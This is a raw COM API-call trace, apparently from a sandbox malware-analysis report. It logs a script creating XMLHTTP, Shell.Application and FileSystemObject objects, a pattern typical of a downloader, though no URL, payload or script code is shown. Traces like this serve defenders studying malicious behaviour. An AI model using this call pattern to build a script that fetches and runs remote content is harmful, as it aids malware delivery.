	[0409.995] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0409.995] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0409.996] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0409.996] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0410.536] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0410.536] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0410.536] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0410.536] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0410.536] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0410.537] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0410.537] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0410.537] SysStringLen (param_1=0x0) returned 0x0
	[0410.537] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0410.537] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0410.537] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0410.537] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0410.537] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0410.537] ??2@YAPEAX_K@Z () returned 0x62f350
	[0410.537] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0410.537] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0410.537] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0410.537] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0410.537] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0410.537] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0410.538] SysStringLen (param_1=0x0) returned 0x0
	[0410.538] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0410.541] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0410.541] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0410.541] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0410.541] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0410.541] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0410.542] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0411.511] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0411.511] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0411.511] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0411.512] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0411.512] SysStringLen (param_1=0x0) returned 0x0
	[0411.512] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0411.512] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0411.512] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0411.512] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0411.512] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0411.513] ??2@YAPEAX_K@Z () returned 0x62f330
	[0411.513] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0411.513] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0411.513] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0411.513] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0411.513] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0411.513] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0411.513] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0411.516] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0411.516] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0411.516] SysStringLen (param_1=0x0) returned 0x0
	[0411.516] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0411.516] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0411.516] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0411.516] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0411.516] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c68) returned 0x0
	[0411.516] ??2@YAPEAX_K@Z () returned 0x62f310
	[0411.516] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c68, pUnkSite=0x62f310) 
	[0411.516] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0411.516] XMLHTTPRequest:IUnknown:Release (This=0x49c5c68) returned 0x0
	[0411.516] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0411.516] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0411.516] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0411.517] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0411.517] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0411.517] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0411.517] SysStringLen (param_1=0x0) returned 0x0
	[0411.517] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0411.517] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0411.517] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0411.517] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0411.517] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0411.517] ??2@YAPEAX_K@Z () returned 0x62f330
	[0411.517] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0411.517] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0411.517] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0411.517] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0411.517] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0411.518] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0411.518] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0411.518] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0411.518] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0411.518] SysStringLen (param_1=0x0) returned 0x0
	[0411.518] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0411.518] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0411.518] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0411.518] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0411.518] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0411.518] ??2@YAPEAX_K@Z () returned 0x62f310
	[0411.518] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0411.518] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0411.518] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0411.518] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0411.518] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0411.519] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0411.519] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
